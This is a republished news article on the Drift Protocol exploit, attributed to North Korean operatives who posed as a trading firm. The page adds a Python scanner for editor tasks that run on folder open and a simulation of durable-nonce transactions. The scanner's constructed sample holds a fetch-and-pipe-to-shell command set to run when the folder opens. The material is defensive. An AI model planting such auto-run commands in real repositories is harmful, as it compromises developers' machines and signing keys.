Drift says $270 million exploit was a six-month North Korean intelligence operation

By Shaurya Malwa · Published April 5, 2026 · 5 min read · Source: CoinDesk

Attackers posed as a trading firm, met Drift contributors in person across multiple countries, deposited $1 million of their own capital, and waited half a year before executing the drain CoinDesk detailed earlier this week.

A six-month intelligence operation preceded the $270 million exploit of Drift Protocol and was carried out by a North Korean state-affiliated group, according to a detailed incident update published by the team earlier on Sunday.

The attackers first made contact around fall 2025 at a major crypto conference, presenting themselves as a quantitative trading firm looking to integrate with Drift.

They were technically fluent, had verifiable professional backgrounds, and understood how the protocol operated, Drift said. A Telegram group was set up, and months of substantive conversations about trading strategies and vault integrations followed; such interactions are standard for how trading firms onboard with DeFi protocols.

Between December 2025 and January 2026, the group onboarded an Ecosystem Vault on Drift, held multiple working sessions with contributors, deposited over $1 million of their own capital, and built a functioning operational presence inside the ecosystem.

Drift contributors met individuals from the group face to face at multiple major industry conferences across several countries through February and March. By the time the attack launched on April 1, the relationship was nearly half a year old.

The compromise appears to have come through two vectors. One contributor opened a code repository from the group in their editor; a second downloaded a TestFlight application, Apple's platform for distributing pre-release apps that do not go through the full App Store review, which the group presented as their wallet product.

For the repository vector, Drift pointed to a known vulnerability in VS Code and Cursor, two of the most widely used code editors in software development, that the security community had been flagging since late 2025: simply opening a file or folder in the editor was sufficient to silently execute arbitrary code, with no prompt or warning of any kind.
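A pre-open check is the practical takeaway from the repository vector. The script below is an added example written for this page; it is not Drift's, CoinDesk's or any editor vendor's code. It assumes the auto-execution path is a VS Code task with `runOptions.runOn` set to `"folderOpen"` in `.vscode/tasks.json` (a documented VS Code feature whose configuration directory Cursor also reads); whether that is exactly the bug Drift referred to is an assumption, as are the `.cursor` directory, the settings-key heuristic and the constructed sample checkout. Because these files are JSON with comments and trailing commas, the scanner strips those before parsing rather than trusting the stdlib parser to accept them.

```python
"""Scan a cloned repository for editor configuration that runs code on folder open.

Added example for this article (not Drift's, CoinDesk's or an editor vendor's code).
Assumption: the auto-run path is a VS Code task with runOptions.runOn == "folderOpen";
the .cursor directory and the settings-key heuristic are assumptions as well.
Usage: python scan_repo.py /path/to/checkout   (no argument runs the constructed demo)
"""
import json
import os
import sys
import tempfile
from dataclasses import dataclass

CONFIG_DIRS = {".vscode", ".cursor"}                 # .cursor is an assumption
SUSPECT_SETTING_SUFFIXES = ("Path", ".path")         # heuristic: settings that point at executables


@dataclass
class Finding:
    path: str
    severity: str
    detail: str


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments and trailing commas, but never touch string contents
    (so "https://..." inside a command string survives)."""
    out, last_comma, in_str, i, n = [], None, False, 0, len(text)
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:          # copy the escaped character verbatim
                out.append(text[i + 1]); i += 1
            elif c == '"':
                in_str = False
            i += 1
            continue
        if text.startswith("//", i):
            j = text.find("\n", i); i = n if j < 0 else j; continue
        if text.startswith("/*", i):
            j = text.find("*/", i + 2); i = n if j < 0 else j + 2; continue
        if c == '"':
            in_str, last_comma = True, None
        elif c == ",":
            last_comma = len(out)                # may turn out to be a trailing comma
        elif c in "}]":
            if last_comma is not None and all(ch.isspace() for ch in out[last_comma + 1:]):
                del out[last_comma]              # only whitespace since the comma: it was trailing
            last_comma = None
        elif not c.isspace():
            last_comma = None
        out.append(c)
        i += 1
    return "".join(out)


def parse_jsonc(text: str):
    return json.loads(strip_jsonc(text))


def scan_tasks(path: str, data, findings: list) -> None:
    """Flag every task the editor will start the moment the folder is opened."""
    for task in (data.get("tasks") or []) if isinstance(data, dict) else []:
        if isinstance(task, dict) and (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
            findings.append(Finding(path, "high",
                f"task {task.get('label', '?')!r} auto-runs on folder open: {cmd.strip()}"))


def scan_settings(path: str, data, findings: list) -> None:
    """Heuristic: workspace settings that redirect the editor to a binary of the repo's choosing."""
    if isinstance(data, dict):
        for key, value in data.items():
            if isinstance(value, str) and key.endswith(SUSPECT_SETTING_SUFFIXES):
                findings.append(Finding(path, "medium", f"setting {key!r} points the editor at {value!r}"))


def scan_repo(root: str) -> list:
    findings: list = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        in_cfg = os.path.basename(dirpath) in CONFIG_DIRS
        for name in filenames:
            path = os.path.join(dirpath, name)
            if not ((in_cfg and name.endswith(".json")) or name.endswith(".code-workspace")):
                continue
            try:
                with open(path, encoding="utf-8-sig") as f:
                    data = parse_jsonc(f.read())
            except (OSError, ValueError) as exc:
                findings.append(Finding(path, "low", f"could not parse: {exc}"))
                continue
            if name == "tasks.json":
                scan_tasks(path, data, findings)
            elif name == "settings.json":
                scan_settings(path, data, findings)
            elif name.endswith(".code-workspace") and isinstance(data, dict):
                scan_tasks(path, data.get("tasks") or {}, findings)       # workspace files embed both
                scan_settings(path, data.get("settings") or {}, findings)
    return findings


# Constructed sample: a checkout whose tasks.json runs a shell pipeline on folder open.
MALICIOUS_TASKS_JSON = r'''{
  // presented as a harmless dev helper; runs the moment the folder is opened
  "version": "2.0.0",
  "tasks": [
    { "label": "setup", "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" }, },
  ],
}'''


def run_demo() -> list:
    """Write the constructed checkout into a temp dir and scan it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, ".vscode"))
    with open(os.path.join(root, ".vscode", "tasks.json"), "w") as f:
        f.write(MALICIOUS_TASKS_JSON)
    with open(os.path.join(root, ".vscode", "settings.json"), "w") as f:
        f.write('{"editor.tabSize": 2}')          # benign, must not be flagged
    return scan_repo(root)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for fnd in (scan_repo(target) if target else run_demo()):
        print(f"[{fnd.severity}] {fnd.path}: {fnd.detail}")
```

The scan is a tripwire, not a substitute for the editor's own Workspace Trust control: run it from a plain shell on the fresh clone, and treat any high finding as a reason not to open the folder on a machine that holds signing keys.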

Once those devices were compromised, the attackers had what they needed to obtain two multisig approvals on transactions built around durable nonces, the attack CoinDesk detailed earlier this week. An ordinary Solana transaction expires with its recent blockhash within roughly a minute; a durable-nonce transaction instead stays valid until the nonce account it references is advanced. That is why the pre-signed transactions could sit dormant for more than a week before being executed on April 1, draining $270 million from the protocol's vaults in under a minute.
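The lifetime difference that made the dormant transactions possible, as an added model written for this page rather than Drift's, CoinDesk's or Solana's code. It is a pure-Python simulation, not the Solana SDK: the 150-slot blockhash lifetime and the advance-to-invalidate behaviour of nonce accounts follow Solana's design, while the 400 ms slot time, the 2-of-3 threshold, the signer names and the nonce account address are assumed or constructed. It also shows the two defensive moves a team can make: audit pending approvals for fully signed durable-nonce transactions, and advance (or close) the nonce account so anything signed against the old value dies.

```python
"""Why a pre-signed durable-nonce transaction does not expire, and how to kill it.

Added example (not Drift's, CoinDesk's or Solana's code). Assumptions: 150-slot
blockhash lifetime and advance-to-invalidate nonces (Solana's design); 400 ms slots,
2-of-3 threshold, signer names and addresses are constructed for the model.
"""
import hashlib
from dataclasses import dataclass, field
from typing import Optional

BLOCKHASH_LIFETIME_SLOTS = 150                   # recent blockhash valid for ~150 slots (~1 minute)
SLOTS_PER_WEEK = 7 * 24 * 3600 * 1000 // 400     # assumed 400 ms slot time
THRESHOLD = 2                                    # constructed 2-of-3 multisig


def blockhash_for(slot: int) -> str:
    """Deterministic stand-in for the blockhash produced at a slot."""
    return hashlib.sha256(f"slot-{slot}".encode()).hexdigest()[:16]


@dataclass
class Transaction:
    payload: str
    recent_blockhash: str                 # normal tx: a recent blockhash; durable tx: the nonce value
    nonce_account: Optional[str] = None   # set when the first instruction is AdvanceNonceAccount
    signatures: set = field(default_factory=set)


@dataclass
class Chain:
    slot: int = 0
    nonce_accounts: dict = field(default_factory=dict)   # address -> currently stored nonce value
    executed: list = field(default_factory=list)

    def current_blockhash(self) -> str:
        return blockhash_for(self.slot)

    def recent_blockhashes(self) -> set:
        lo = max(0, self.slot - BLOCKHASH_LIFETIME_SLOTS + 1)
        return {blockhash_for(s) for s in range(lo, self.slot + 1)}

    def create_nonce_account(self, address: str) -> None:
        self.nonce_accounts[address] = self.current_blockhash()

    def advance_nonce(self, address: str) -> None:
        """Rotate the stored value: every tx signed against the old value is now unusable."""
        self.nonce_accounts[address] = self.current_blockhash()

    def is_valid(self, tx: Transaction) -> bool:
        if len(tx.signatures) < THRESHOLD:
            return False
        if tx.nonce_account is None:
            return tx.recent_blockhash in self.recent_blockhashes()          # expires in ~1 minute
        return self.nonce_accounts.get(tx.nonce_account) == tx.recent_blockhash   # never expires

    def execute(self, tx: Transaction) -> bool:
        if not self.is_valid(tx):
            return False
        if tx.nonce_account is not None:
            self.advance_nonce(tx.nonce_account)   # AdvanceNonceAccount runs first, blocking replay
        self.executed.append(tx.payload)
        return True


def dormant_durable_txs(pending: list) -> list:
    """Audit check: fully signed, unexecuted transactions that will never expire on their own."""
    return [tx for tx in pending if tx.nonce_account is not None and len(tx.signatures) >= THRESHOLD]


def run_scenario() -> dict:
    chain = Chain()
    chain.create_nonce_account("nonce-A")
    normal = Transaction("drain vault", chain.current_blockhash())
    durable = Transaction("drain vault", chain.nonce_accounts["nonce-A"], nonce_account="nonce-A")
    for tx in (normal, durable):
        tx.signatures |= {"signer-1", "signer-2"}   # two approvals obtained from compromised devices
    out = {"both_valid_when_signed": chain.is_valid(normal) and chain.is_valid(durable)}

    chain.slot += SLOTS_PER_WEEK                     # the attackers wait a week
    out["normal_valid_after_week"] = chain.is_valid(normal)
    out["durable_valid_after_week"] = chain.is_valid(durable)
    out["flagged_by_audit"] = [tx.payload for tx in dormant_durable_txs([normal, durable])]

    # Defended branch: the nonce authority advances the nonce before anyone submits the tx.
    defended = Chain(slot=chain.slot, nonce_accounts=dict(chain.nonce_accounts))
    defended.advance_nonce("nonce-A")
    out["durable_valid_after_advance"] = defended.is_valid(durable)

    # Undefended branch: the week-old transaction executes, and cannot be replayed afterwards.
    out["durable_executed"] = chain.execute(durable)
    out["durable_replay"] = chain.execute(durable)
    return out


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
```

The audit function is the part worth lifting into a real multisig review: any proposal that carries both a full set of signatures and a nonce-account reference is a standing liability until it is either executed or invalidated by advancing the nonce.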

The attribution points to UNC4736, a North Korean state-affiliated group also tracked as AppleJeus or Citrine Sleet. It rests on on-chain fund flows that trace back to the Radiant Capital attackers and on operational overlap with known DPRK-linked personas.

The individuals who appeared in person at conferences were not North Korean nationals, however. DPRK threat actors at this level are known to deploy third-party intermediaries with fully constructed identities, employment histories, and professional networks built to withstand due diligence.

Drift urged other protocols to audit access controls and treat every device touching a multisig as a potential target. The broader implication is uncomfortable for an industry that relies on multisig governance as its primary security model.

But if attackers are willing to spend six months and a million dollars building a legitimate presence inside an ecosystem, meet teams in person, contribute real capital, and wait, the question is what security model is designed to catch that.

This article was originally published on CoinDesk and is republished here under RSS syndication for informational purposes. All rights and intellectual property remain with the original author. If you are the author and wish to have this article removed, please contact us at [email protected].